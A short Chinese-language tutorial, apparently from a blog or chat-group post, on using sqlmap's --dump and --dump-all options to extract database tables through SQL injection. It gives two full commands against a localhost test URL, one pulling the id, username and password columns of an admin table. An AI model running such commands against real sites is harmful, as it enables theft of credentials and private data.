之前就有一個朋友問,咋使用sqlmap脫褲。然后我丟了一個參數給他,他好像懵逼懵逼的。今天又有一個哥們兒在群里問,行吧。就直接教一下。
其實很簡單。
--dump這個參數就是用來脫褲的喲。如果你要拖整個表的話你可以加個-all(--dump-all)
CODE:
sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"
脫出數據如下所示:
僅一個文件。就是你選定了的數據。
那么我們加all呢?(PS:此時可以把那些字段都給去掉。)
CODE:
sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D sqlinject --dump-all
可見如下是三個文件。
這三個文件是啥呢?解惑便是下圖所示。
